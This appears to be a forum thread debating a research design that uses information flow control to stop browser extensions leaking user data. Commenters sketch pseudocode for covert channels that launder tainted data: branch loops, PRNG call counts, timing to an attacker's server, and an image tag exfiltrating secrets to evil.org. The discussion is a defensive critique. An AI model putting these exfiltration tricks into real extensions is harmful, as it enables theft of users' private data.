Very good points. We proposed a way to deal with DOM manipulation in
the paper [1], but Stefan omitted this in the blog post. Specifically,
Section 4 of the paper (the "Page access" paragraph) briefly describes
this. (Sorry for referring you to the paper, but our wording in the
paper is probably better than my attempt to paraphrase here.)
Of course there are other ways malicious extensions can be used to leak
data---pick your favorite covert channel. But the idea was to propose
APIs (and mechanisms) that are not overtly leaky. (We are early in the
process of actually building this though.)
"To ensure that extensions cannot
leak through the page’s DOM, we argue that extensions
should instead write to a shadow-copy of the page
DOM—any content loading as a result of modifying the
shadow runs with the privilege of the extension and not
the page. This ensures that the extension’s changes to the
page are isolated from that of the page, while giving the
appearance of a single layout"
Could you elaborate more on this? Do you mean that you'll compare the network requests made from the main and the shadow pages? What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently.
From a more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM.
"Do you mean that you'll compare the network requests made from the main and the shadow pages?"
Essentially, yes. Requests from the extension should be treated as if
they are of an origin different from the page. (We could potentially
piggy-back on existing notions of security principals (e.g., that
Firefox has) to avoid huge performance hits.) And if the extension is
tainted the kinds of requests will be restricted according to the
taint (as in COWL [1], likely using CSP for the underlying
enforcement).
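For intuition, a purely illustrative example (not the actual policy we generate): a context tainted by gmail.com data might map down to a CSP policy along these lines, so the browser's existing machinery blocks requests to other origins.

Content-Security-Policy: default-src 'none';
    connect-src https://mail.google.com;
    img-src https://mail.google.com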
"What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently."
If by main script you mean a script on the page, then there should be no real difference.
"From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM."
I hope this won't be so bad down the line (assuming we'd be able to
leverage some underlying shadow DOM infrastructure that performs
relatively well).
I think part of what you are proposing Chrome already implements and calls "isolated worlds". Chrome extensions don't operate directly on the page's DOM; they have an isolated version of it (https://developer.chrome.com/extensions/content_scripts).
So in principle, we already have the context from which we can decide which network requests to allow or block (this is already used today to allow cross-origin XHR from content scripts).
However, it is super gnarly to implement your idea in practice because:
1. There has to be a connection traced from every network request back to the JS context which ultimately caused the request (e.g., by mutating the DOM). This is doable; it's just a lot of work.
2. There can't be any way to execute JavaScript in the page - even with the page's principal. Such mechanisms exist today by design because developers desire them.
3. Even if you do 1 and 2, there are still channels such as hyperlinks. The extension could add a hyperlink and get the user to click on it. I suppose you could try and tie that back to the script context that created or modified the hyperlink.
4. Even if you do 1-3, if you can induce the page script (or any other extension, or the browser, or the user) to request a URL of your design, you win.
Sigh. Still seems fun as a research project to see how close you could get.
Yep, isolated worlds is definitely what we want, and part of the inspiration for the particular (DOM modification) feature we proposed.
I think CSP helps with 1 & 2, unless I'm missing something? (Our labels map down to CSP policies pretty naturally.)
Points 3-4 and phishing, in general, are definitely a concern. Unfortunately, I'm not sure that a great solution that does not get in the way exists, but we'll see how close we can get :)
CSP does help, but it is document-specific, not js-context specific. At least in Chrome, tracing the js context that was responsible for some network request would be significantly more difficult to implement.
Case in point: Kaspersky (respected antivirus software) is doing disturbing things with extensions and plug-ins.
Kaspersky Internet Security and Kaspersky Total Security are adding an extension to your browser called "Safe Money" and an associated plug-in called "Online Banking" that protect your banking transactions. It opens a separate "protected" browser tab, verifies credentials, checks for spoofing, etc. This is all fine, I think.
However, I was annoyed to discover that it acts as a man-in-the-middle to monitor the HTTPS traffic between me and my bank or credit card site. I suppose Kaspersky wants to check for malicious content sent by a fake bank site or whatever. But I don't want Kaspersky scanning/storing/analyzing my bank transactions and bank passwords.
Kaspersky does not tell you that they are doing MITM, or what they're checking for, or what (if any) info is sent back to their servers for analysis, or what (if anything) is stored.
I removed "Safe Money" and all of their other extensions and plug-in[1]. I still use Kaspersky, but if a security-oriented company is engaging in shenanigans with extensions and plug-ins, then what do we expect from less trustworthy companies?
[1] You cannot remove Kaspersky's extensions and plug-ins directly from Firefox. If you disable the Kaspersky extensions, the next time you restart Firefox, they are re-enabled. If you set the Kaspersky plug-ins to "Never activate", the next time you restart Firefox, they are back to "Always activate". Kaspersky has gone to a lot of effort to make it nearly impossible to remove their extensions and plug-ins once you install them! It took me a long time to get rid of them.
I can't really take antivirus software (or the whole company) seriously if they can't even host their "trial version" download behind HTTPS. It's not like they host PGP signatures; at least they could do that. I don't know how they host the paid version, but it's really not a good sign.
How was Kaspersky re-enabling their extensions? Do they have a separate service running in the background? How did you eventually uninstall it? Might be worth filing a Firefox bug to report the problem, in case something can be done (by blocking the extension or contacting Kaspersky).
I don't know how they were re-enabling their extensions.
I got rid of the Kaspersky extensions as follows:
In the Kaspersky menu, I went to Settings > Protection > Web Anti-Virus > Advanced Settings, and unchecked "Automatically activate application plug-ins in all web browsers". Though Kaspersky's settings refer to plug-ins, this actually disables the extensions, not the plug-ins. You can't choose which of their 3 extensions to enable or disable; it's all or nothing. I also disabled Kaspersky's Web Anti-Virus, which may or may not have been necessary to the procedure.
As to how they were re-enabling plug-ins, I found a comment on the Kaspersky forums that seems informative and I'll quote here:
FF stores all its settings in prefs.js file but user.js file serves a different purpose.[1] A user.js file is an alternative method of modifying preferences, recommended for advanced users only. Unless you need a user.js file for a specific purpose you should use about:config instead. The user.js file does not exist by default. Once an entry for a preference setting exists in the user.js file, any change you make to that setting in the options and preference dialogs or via about:config will be lost when you restart your Mozilla application because the user.js entry will override it.[2] So, here is what KIS does: after installation it creates user.js file in your Firefox profile and writes a couple of preferences there that activate Kaspersky plugins. As the result, even if you disable the plugins in FF settings, they will be enabled after restart.[3]
I personally got rid of the Kaspersky plug-ins as follows:
- Saved my Firefox bookmarks
- Uninstalled Firefox
- Removed my FF profile (in Windows 7, it's c:/Users/<username>/AppData/Roaming/Mozilla/Firefox/Profiles/*)
- Disabled Kaspersky
- Reinstalled Firefox
- Created a new profile in Firefox (FF will ask you if the profile is missing)
- Restored my Firefox bookmarks
- Re-enabled Kaspersky
I love Kaspersky, but their Safe Money extension is absolutely rubbish. It's quite common to have the payment gateway embedded in an iFrame, which gets caught by the filter, and then the "open in a protected browser" breaks it.
I believe that concerns like this are why Apple will introduce the "content blocking" extensions in iOS 9 and OS X 10.11. They enable the most popular types of extension (ad blocking and privacy protection) without letting extension code run in your browser.
While the tainted data approach sounds interesting, I don't think there's an easy way to guarantee the safeness of arbitrary code executed on your machine. It's possible to sandbox code, but as soon as you allow any communication at all, there's no automated way to prevent data theft.
"I believe that concerns like this are why Apple will introduce the
"content blocking" extensions in iOS 9 and OS X 10.11. They enable the
most popular types of extension (ad blocking and privacy protection)
without letting extension code run in your browser."
Fully agree. We actually described exactly that mechanism in an early
version of our paper (declarative APIs), but didn't have enough space
to do it for the final version.
"While the tainted data approach sounds interesting, I don't think there's an easy way to guarantee the safeness of arbitrary code executed on your machine. It's possible to sandbox code, but as soon as you allow any communication at all, there's no automated way to prevent data theft."
It turns out, it is possible with information flow control (IFC). The
simple idea behind IFC is to protect data by labeling/tagging it and
restricting code according to the kinds of labeled data it reads. Once
code in an execution context (e.g., iframe or process) reads some
labeled data, IFC restricts where it can further communicate. In the
simplest form: once you read data that is SECRET, you can't write to
any PUBLIC communication channel. (You can, of course, write to a
SECRET channel.)
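As a minimal sketch of that rule (illustrative names only, not our actual API), the check could look something like this:

// Two-point label lattice: PUBLIC may flow to SECRET, never the reverse.
type Label = "PUBLIC" | "SECRET";

const join = (a: Label, b: Label): Label =>
  a === "SECRET" || b === "SECRET" ? "SECRET" : "PUBLIC";

const canFlowTo = (from: Label, to: Label): boolean =>
  from === "PUBLIC" || to === "SECRET";

class Context {
  private label: Label = "PUBLIC";

  read(data: { label: Label; value: string }): string {
    // Reading labeled data taints the whole context (e.g., an iframe or worker).
    this.label = join(this.label, data.label);
    return data.value;
  }

  write(channel: { label: Label; send(msg: string): void }, msg: string): void {
    // Once tainted SECRET, writes to PUBLIC channels are refused.
    if (!canFlowTo(this.label, channel.label)) {
      throw new Error("IFC violation: context label exceeds channel label");
    }
    channel.send(msg);
  }
}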
> but as soon as you allow any communication at all, there's no automated way to prevent data theft.
I think you missed the point of the article, which proposes exactly that.
All I/O functions would tag all variables populated by them with the source of the data.
When a tagged ("tainted") variable is used in an I/O function again, we can compare origin/destination and apply firewall-style filtering or prompt the user.
.----------------------------------------.
| Add-On "Evernote" has read data from: |
| Chrome Clipboard |
| |
| and wants to send it to: |
| http://evernote.com |
+----------------------------------------+
| [Deny] [Allow] ( ) Remember |
`----------------------------------------'
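A rough sketch of what that tagging could look like (hypothetical names, not an existing browser API):

// Values read via I/O carry the set of sources they came from.
type Tagged<T> = { value: T; sources: Set<string> };

declare function rawClipboardRead(): string;                               // underlying I/O primitive
declare function askUser(source: string, dest: string): Promise<boolean>;  // the dialog above

function readClipboard(): Tagged<string> {
  // Every I/O read returns a value tagged with where it came from.
  return { value: rawClipboardRead(), sources: new Set(["Chrome Clipboard"]) };
}

async function sendTo(dest: string, data: Tagged<string>): Promise<void> {
  // Firewall-style check at the outgoing I/O call: compare each recorded
  // source against the destination and prompt the user if they differ.
  for (const source of data.sources) {
    if (source !== dest && !(await askUser(source, dest))) {
      throw new Error("blocked: user denied " + source + " -> " + dest);
    }
  }
  await fetch(dest, { method: "POST", body: data.value });
}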
for (int i=0;i<LEN; i++) {
for (char c=0; c<255;c++) {
if (tainted[i] == c) {
untainted[i] = c;
}
}
}
send(untainted);
If no, the protection obviously doesn't work. If yes, almost all variables end up tainted (you don't usually read data that doesn't influence code paths or global state in your application).
In the promiscuous world of imperative programming there are millions of ways to introduce a dependency that can't be automatically checked.
For something more complex, you can have workers/threads doing while(true) { sleep(); next_letter(); } and other workers killing them after a calculated time.
Or you can draw a different number of pseudorandom numbers from a generator with a known seed in a loop that depends on tainted data, and after the loop set untainted data based on the current random number from the same generator. Calling rand() taints the generator.
I thought they would just mark the whole extension as tainted once it reads tainted data. And then any communication with other sites shows the warning.
Every variable assigned to within a "loop depending on tainted data" becomes tainted. Calling rand() doesn't taint the generator. Seeding it within a tainted scope does.
Edit: I was wrong (see below), of course rand() also taints the generator.
> Yes, because the assignment happens inside a conditional that references a tainted variable.
What if it was
if (tainted[i] != c) {
  continue;
}
untainted[i] = c;
?
If your checker is smart enough to catch this - your whole program is tainted by your password once you check it in the login screen.
> What is that supposed to achieve?
Global state is incremented by another worker every second to the next value. My thread kills the other worker after N seconds. Now global state = N and I haven't touched it.
If you don't want to call kill() from an if that depends on tainted data, sleep in that if and call kill() immediately after it.
> Calling rand() doesn't taint the generator. Seeding it within a tainted scope does.
It does:
set_seed(1337);
for (int i = 0; i < tainted[0]; i++) {
  rand();
}
int tmp = rand(); // now I know what tainted[0] was,
                  // because I know how many times
                  // rand() was called, because I know
                  // the whole sequence because I know
                  // the (untainted) seed.
To clarify, tainting "scope" doesn't refer to variable scope but is commonly implemented as a (thread-local) global dict that tracks tainted access in execution order.
In your example the variable 'c' would be tainted from the moment the conditional evaluates until it is either re-assigned (from a non-tainted source) or until the program ends.
> If your checker is smart enough to catch this - your whole program is tainted by your password once you check it in the login screen.
Not sure what you mean by "your password" in this context. Which password, from what source?
Even without shared workers a timing attack works - an untainted worker can connect to the attacker's site every second and update a value, and be killed by untainted code after the tainted worker finishes.
EDIT: or you can do this with no multithreading at all - just call getMilliseconds() before and after the tainted code, and make the tainted part last secret_number milliseconds.
Or if you blacklist getMilliseconds() as tainting, do the timing on the server instead:
callAttackersServer();
{
  var tainted_int = getFromOtherServer();
  for (var i = 0; i < tainted_int; i++) {
    sleep(100); // ms
  }
}
callAttackersServer();
and the difference in time between calls will be interpreted on the server as the secret number.
You do that, and basically you end up treating everything as tainted.
Also: yes, you are missing something. Namely that you don't need concurrency for this sort of timing attack. Even something as simple as "X does work or doesn't" and "Y measures execution time" leaks timing info.
For another example: X either reflows the page, or doesn't. Y keeps track of the refresh rate of the page. Or does a timing attack to determine if the page was reflowed or not. Or injects JS into the page to ping website Z when a reflow happens. (Note that it can inject this JS before it grabs the sensitive data.)
For another example: Depending on sensitive data, I either allocate a large array or don't. And then detect how much is allocated before a GC happens.
Note that this can be part JS / part "trusted" extension. It can also even take advantage of parts of existing pages.
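To make the simplest of these concrete, here is a sketch (illustrative only) of the "X does data-dependent work, Y measures execution time" channel. Note that the measuring code never touches the secret, so per-variable tainting as discussed above would not flag the recovered bit:

// X: runs longer when the secret bit is 1, without ever writing it anywhere.
function taintedWork(secretBit: number): void {
  const end = Date.now() + (secretBit === 1 ? 100 : 0);
  while (Date.now() < end) { /* spin */ }
}

// Y: never reads the secret, only the clock, so nothing it holds gets tagged.
function measureBit(run: () => void): number {
  const start = Date.now();
  run();
  return Date.now() - start > 50 ? 1 : 0; // recovered secret bit
}

// measureBit(() => taintedWork(secretBit)) leaks one bit per call.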
The more I consider this scheme, the more I think it's an elegant scheme against accidental leaks, but is fundamentally flawed against malicious leaks. Unfortunately, since the entire point of it is to protect against malicious leaks...
I'm not sure I follow your examples - you seem to ignore that anything happening inside a conditional that depends on a tainted variable becomes tainted itself.
So if you read my cookies and then access the DOM (to trigger a reflow or inject JS), then all future accesses to the DOM will be considered tainted.
This doesn't taint "everything", but it should taint exactly what we want to be tainted (all possible paths to our sensitive data).
Yes, the challenge would be to find and treat all covert channels (time, GC, PRNG etc.), but that seems surmountable. The very exotic channels (like your GC example) are best handled by trimming down the general API for trusted extensions.
I.e., most extensions don't need any kind of GC access to begin with. If your extension does, then all bets for fine-grained taint checks are off and it must be marked as "fully trusted" by the user before proceeding.
"Unfortunately, since the entire point of it is to protect against malicious leaks..."
That's actually not the entire point. At least in this paper, we do
not claim to address attacks that leverage covert channels. But the
attacker model assumption is weaker (i.e., the attacker is assumed to
be more powerful) than that originally assumed by the Chrome design
(e.g., that only pages are malicious and will try to exploit
extensions). And this is important. Particularly because the design
that we end up with will be more secure than the current one. So, at
worst, the new system addresses the limitations of the existing system
under their attacker model. Then, depending on how far you are willing
to hack up the browser, underlying OS, or hardware you can also try to
address the covert channel leaks.
Rather than reply individually to the messages from this thread, I'm
going to try to clarify some things here. I think a lot of good points
were brought up both with regards to the "taint" mechanism and timing
covert channels.
IFC/tainting mechanism:
The style of IFC we are proposing is not the tainting style used
by more typical language-level systems. In particular, we're proposing
a mostly coarse-grained system:
- A single label is associated with a context. A context can be the
main extension context or, more likely, a light-weight worker the
main extension context created. This single label is conceptually
the label on everything in scope. As such, when performing some I/O
this label is used by the IFC mechanism to check if the code is
allowed to perform the read/write. This coarse-grained approach
alleviates the need to keep track of tricky leaks due to control
flow: the branch condition has the label of the context so any
control flow within the context is safe. If you want to perform a
public computation after a secret computation, you need to
structure your program into multiple contexts (e.g. create a new
worker wherein you intend to perform the secret computation).
- Labels can also be associated with values. A new constructor Labeled
is provided for this task. You can think of it as boxing the value
and, by default, only allowing you to inspect the label of the
value. You can pass such labeled values around as you see fit (and
this is pretty useful in real applications). Importantly, however,
when you read the underlying (protected) value the IFC system taints
your context---i.e., it raises the context label to let you read the
value, but also restricts your code from writing to arbitrary
end-points since doing so may leak something about the newly-read
value.
An important requirement of this IFC approach is that there be no
unlabeled (implicit) shared state between the different contexts. For
example, rand() in context A and B must not share an underlying
generator. This kind of isolation can be achieved in practice and is
an important detail when considering covert channels.
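To make the two points above concrete, here is a very rough sketch (illustrative names only, not the actual API from the paper or COWL):

// A label is (roughly) the set of origins whose data the context has read.
type Label = ReadonlySet<string>;

const join = (a: Label, b: Label): Label => new Set([...a, ...b]);
const canFlowTo = (from: Label, to: Label): boolean =>
  [...from].every(origin => to.has(origin));

class Context {
  private label: Label = new Set(); // starts untainted ("public")

  raiseLabel(l: Label): void {
    this.label = join(this.label, l);
  }

  checkWrite(endpoint: Label): void {
    // In practice this check could be enforced by mapping the current
    // context label down to a CSP policy.
    if (!canFlowTo(this.label, endpoint)) {
      throw new Error("write would leak data this context has read");
    }
  }
}

class Labeled<T> {
  constructor(readonly label: Label, private value: T) {}

  // Inspecting the label is always allowed; unwrapping taints the context.
  unlabel(ctx: Context): T {
    ctx.raiseLabel(this.label);
    return this.value;
  }
}

// Usage: unwrap Gmail data inside a fresh worker-like context, so the main
// context stays untainted and can still talk to public endpoints.
const worker = new Context();
const mail = new Labeled(new Set(["https://mail.google.com"]), "message body");
const body = mail.unlabel(worker); // worker is now tainted with mail.google.com
worker.checkWrite(new Set(["https://mail.google.com"])); // ok
// worker.checkWrite(new Set(["https://evil.org"]));      // would throw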
Timing channels:
It turns out that if you do IFC in this coarse-grained fashion you can
prevent leaks due to timing covert channels, if you are willing/able
to schedule contexts using a "secure scheduler." In [1] we showed how
to eliminate timing attacks of the style described in this thread
(internal timing channels) that are inherent to the more typical IFC
systems. In [2] we extended the system to deal with timing attacks due
to the CPU cache by using an instruction-based scheduler (IBS). IBS
and other techniques to deal with timing channels are nicely
described in [3]. (I'd be happy to expand here, but this is already a
long reply.)
Afaict, to not be unusably restrictive, the extension has to at least have access to the originating site by default. Thus the security of the data depends on the originating site being secure against leakage - a property no site is designed to accomplish. Just follow through with the first example of Gmail: an extension can write emails to arbitrary third parties (and erase them immediately afterwards to cover its tracks) by using only the intentionally provided functionality of the site.
As in most cases related to security/privacy, the common user often lacks knowledge about what all this means. They've found an extension with a nice looking logo and a good description that says it will replace ads with pictures of cats - and that's exactly what they want.
In Chrome, you'll get a small popup box where you need to approve the extension's permissions. Things like "This extension can read and edit all the pages you visit" - but there's no further information about what this means. If there were an extended view, where the different permissions were explained, the cat-loving user might start to wonder why the extension requires permissions to read all their history, clipboard, cookies, etc.
In the end, a lot of users will just click the OK button without reading anything. But there's still a greater chance of helping users make a decent choice when they understand what they're installing.
Even in the limited example given there is a clear path of attack. An extension that is permitted to access mail.gmail.com can simply collect its target data, email it to itself, and delete the email afterwards.
Exactly. That's because the assumption that "extensions which deal with sensitive information are perfectly safe as long as they do not disseminate this sensitive information arbitrarily" is wrong. An extension doesn't just have access to information but to functionality too. So an extension which is supposed to make your bank's website less sucky can send your money to someone else. Though, of course, the proposed approach could limit the impact of such extensions (to one site only).
Right, minimizing attack surface is pretty important. Though the
described attack scenario (a form of self-exfiltration attacks [1]) is
something we did think about. (The details of the core IFC mechanism
are described in the COWL paper [2].) For example, if the extension
only needs to read data from gmail.com it is tainted with a unique
origin. (In general, IFC can be used to deal with both
confidentiality and integrity.)
I think a mini browser with only the capabilities required to make a secure transaction should be used when sensitive information is to be transmitted. A full browser with add-ons is far too heavy a piece of software to secure or to test. Banks and other actors should use the mini browser for secure transactions and a full browser for ads and animations.
I do something like that by using different browsers. My main browser on OS X is Chrome with some extensions, but I do all my online banking in Safari where extensions are completely disabled.
I'd expect this to end up, in the best case, like Android app permissions, where almost every app you try to install wants access to GPS and files, and quite a few to SMS. And the reason for this is quite clear - users (on a large scale) don't care about security and probably never will.
What this could help with is organizing easier review process. E.g. if an extension is described to show a weather forecast in the browser, it probably shouldn't be accessing mail.google.com.
The premise is correct - we're willing to leak way too much. The proposed solution is, sadly, still leaky; no metadata scheme need be honoured by calling code. As aboodman noted, there are plenty of exfiltration methods possible, even sneakier ones like constructed DNS queries and the like. You can't catch them all, even if you force scripts through another level of interpretation.
You can readily verify that adblockplus, at least, doesn't take your info or do anything suspicious just by looking at its source: https://adblockplus.org/source That's how you "know" your extension or any other program you run isn't doing anything unwanted, and that is the only way you'll ever know for sure. Browser extensions don't really need an additional layer of security; it is basic computer operation 101 not to install anything you don't trust.
You could of course read the source (although it's likely very few people do), but how do you assure that the code you download and install from the Firefox Add-On store is the same as the code that you read?
As to it being computer operation 101 not to run code you don't trust: how do you establish the trustworthiness of all the pieces of code that run on your computer? There's far too much for anyone to audit by themselves, and there is no good way of assessing the security or intent of most of the organisations that you get code from.
And then a drive-by exploit comes along and silently replaces your extensions with malicious versions. Now you think you are running the source you verified (be honest, you didn't), but you aren't. And it's being evil.
The browser should totally have nice controls for what any extension can do.
Based on what they can do, extensions should be naturally trusted to the same extent as the browser itself... I think this is a feature, not a bug. Besides, AFAIK with extensions being distributed in the form of source code, it's not hard to inspect one to see what it truly does, and it only takes one person to find out and tell everyone else.
The issue with this is updates. In most of these cases with malicious addons, the addon was safe initially, then the author slips in some tracking code / spyware etc. at a later date.
While I might inspect a source for a single sketchy looking addon at installation, inspecting every addon every time it's updated (sometimes weekly or more often) is absurd, and that's why you get cases of adware slipping by for months before anyone notices.
One part of the problem is that most of the extensions are updated silently in the background. Some extensions fire up a new tab with a page displaying new features and such, but this is not a requirement in any way.
Sadly, I believe this won't work. It will just complicate things.
Even if values and their derivatives are "tainted" (remember Perl 5?) there are _always_ means to take a value and "untaint" it. Unless, of course, the set of possible operations on such a value is severely restricted, but I believe that'd make things unusable.
This reminds me of ICFPC'08 (one of best ICFP contests ever) where one of the puzzles was about a robot that wasn't able to disclose secret blueprint contents because of a Censory Engine. Every time a secret or some derived value was about to be printed, it was replaced with "REDACTED". Surely, there was a way to work around this. ;)
So, a malicious extension would always be able to steal your password and send it to a remote site, even if it would have to leak the data bit by bit, a single bit per request, over a side channel.
>> We found that more than 71% of extensions require permission to “read and change all your data on the websites you visit”.
This is exactly the reason why I install so few extensions and buy none.
The same is becoming true for Android apps; more of them require more permissions every day. Recently an app I'd run for months if not years wanted to install an update and demanded that I give it permission to view my phone calls and even the remote caller's phone number. This had nothing to do with the purpose of that app; all it would need at most is to know whether a phone call came in so it could pause.
Do you mean if I open tab A on one site and tab B on another then they can read each other's data without any special permissions from me? If so then that's a security breach and not a discussion of which permissions a web app or mobile app should be allowed to have.
Click on "Behavior" to see the history, or look at realtime activity from extensions or apps. Requests and accesses(!) get recorded. It shows privacy-related history, and the extension is from Google.
The concern is real, and I thought some of the proposed solutions were nice. But then I read things like "by default only GET requests are possible, which only allow reading a website", and I think: why.. why?
That last idea, encrypting data before it gets sent out, seems vulnerable to fingerprinting or other leakage. What kind of encryption would give evil.com no information about the plaintext?
Yep, you are right. If the crypto/label API didn't force a
fixed-length blob (which may be hard to do), it would certainly be
leaking some information.
I was thinking more like timing side channels (if you can force the encryption at will and it isn't fixed time).
The possible security models where you can send data but it's encrypted are not very appealing. For a single application it may be fine (lastpass, or chrome syncing with passphrase), but it's really hard to see how that can be a standard api and remain secure.
That's a tricky question. Some extensions (e.g., HTTPS Everywhere [1])
can improve your privacy on the Web and are arguably written by
developers that are as trustworthy as your browser developers. But, in
general, I would be cautious.
Extensions available officially for major browsers are put through a review process first, and installing unofficial extensions requires going out of your way and there are multiple warnings given. The article conveniently doesn't mention this. FUD.
> The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.
A computer provably (in the mathematical sense) cannot detect all forms of bad behaviour; and the security history of all the software in the world proves (in the historical, not mathematical, sense) that neither can the best programmers, let alone overworked reviewers who see mostly benign or trivially malicious code and so are not experienced in finding subtly malicious code.
Firefox extensions are human-reviewed. Unfortunately Chrome's aren't unless their automated system detects something, so for Chrome these concerns are more valid.
This may be outdated, and Google might have improved the process, but the problem I found is that trying to report the extension didn't seem to have any effect.
I had an experience a while ago where I found a Chrome extension that was inserting its own ads among Google search results. It was subtle enough that most people would probably never notice it happening, inserting an ad in a place where you would expect Google to display an ad in the results.
Unfortunately, the DOM itself is so flexible and powerful, that it can be used to exfiltrate information through a variety of mechanisms.
For example, that same extension that only has access to gmail.com's DOM? Well, it can add an image like <img src="evil.org?{secrets}">.
The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.